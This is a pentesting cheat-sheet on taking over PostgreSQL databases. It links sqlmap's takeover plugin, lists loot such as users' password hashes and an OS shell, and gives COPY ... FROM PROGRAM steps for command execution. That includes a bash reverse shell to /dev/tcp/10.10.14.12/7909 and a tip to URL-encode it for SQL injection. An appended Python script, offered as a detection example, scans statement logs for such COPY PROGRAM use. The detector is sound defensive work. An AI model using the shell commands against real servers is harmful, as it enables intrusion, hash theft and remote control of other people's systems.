# PostgreSQL

### Compromising DB - \[sqlmap code]:

<https://github.com/sqlmapproject/sqlmap/blob/582bb2fec960db825478a54c0aabbd7ba551f1b8/plugins/dbms/postgresql/takeover.py>

### Properties:

* Nested queries: query1;query2;...
* Interact with the DB via the command line: psql\
  quit: \q
* Loot:\
  1\. DBMS Version\
  2\. Database Content\
  3\. DBMS Users Password Hashes\
  4\. OS Shell

### OS Shell \[ v9.3–v14 ]:

1\. DROP TABLE IF EXISTS cmd\_exec;\
2\. CREATE TABLE cmd\_exec(cmd\_output text);\
3\. COPY cmd\_exec FROM PROGRAM '\<cmd>';\
For example: COPY cmd\_exec FROM PROGRAM 'bash -c "/bin/bash -l > /dev/tcp/10.10.14.12/7909 0<&1 2>&1"';\
*Note: the command must be wrapped in single quotes. URL-encode the whole POST/GET data.*
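
Detection side of the steps above, as an added example (not part of the original notes or of sqlmap): a Python scan of PostgreSQL statement logs for `COPY ... FROM/TO PROGRAM`, which PostgreSQL restricts to superusers and, from version 11, members of the `pg_execute_server_program` role. The `log_line_prefix` value, the name `find_copy_program` and the sample log lines are assumptions constructed for illustration.

```python
import re

# SQL comments can stand in for whitespace between keywords, so match them too.
WS = r"(?:\s|/\*.*?\*/|--[^\n]*\n)+"
COPY_PROGRAM = re.compile(
    rf"\bCOPY\b(?:{WS})?[^;]+?{WS}(?P<dir>FROM|TO){WS}PROGRAM\b(?:{WS})?"
    r"E?'(?P<cmd>(?:''|[^'])*)'", re.I | re.S)
# Assumption: log_line_prefix = '%m [%p] %u@%d ' and log_statement = 'all'.
# "STATEMENT:" lines follow an ERROR, so denied attempts are reported as well.
LOG_ENTRY = re.compile(
    r"(?P<ts>\S+ \S+ \S+) \[\d+\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"(?:LOG:\s+statement:|STATEMENT:)\s+(?P<sql>.*)", re.S)

def find_copy_program(log_text):
    """Return one finding per COPY ... FROM/TO PROGRAM seen in logged statements."""
    entries = []
    for line in log_text.splitlines():
        if line.startswith("\t") and entries:  # continuation of a multi-line statement
            entries[-1] += "\n" + line.strip()
        else:
            entries.append(line)
    findings = []
    for entry in entries:
        head = LOG_ENTRY.match(entry)
        if not head:
            continue
        for hit in COPY_PROGRAM.finditer(head["sql"]):
            findings.append({
                "time": head["ts"], "user": head["user"], "db": head["db"],
                "direction": hit["dir"].upper(),
                "command": hit["cmd"].replace("''", "'"),  # undo SQL quote doubling
            })
    return findings

# Constructed sample log, not captured from a real server.
SAMPLE_LOG = (
    "2024-05-01 12:00:01.000 UTC [4101] app@shop LOG:  statement: SELECT id FROM orders WHERE id = 7;\n"
    "2024-05-01 12:00:02.000 UTC [4101] app@shop LOG:  statement: COPY orders FROM STDIN;\n"
    "2024-05-01 12:00:03.000 UTC [4102] postgres@shop LOG:  statement: SELECT 1;DROP TABLE IF EXISTS cmd_exec;"
    "CREATE TABLE cmd_exec(cmd_output text);copy/**/cmd_exec\n"
    "\tfrom program 'id';\n"
    "2024-05-01 12:00:04.000 UTC [4103] app@shop ERROR:  permission denied to COPY to or from an external program\n"
    "2024-05-01 12:00:04.000 UTC [4103] app@shop STATEMENT:  COPY cmd_exec FROM PROGRAM 'echo ''x''';\n"
)

if __name__ == "__main__":
    print(find_copy_program(SAMPLE_LOG))
```

A hit from a web application's database role is worth alerting on in its own right, since an application account normally has no reason to hold superuser or `pg_execute_server_program` privileges.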
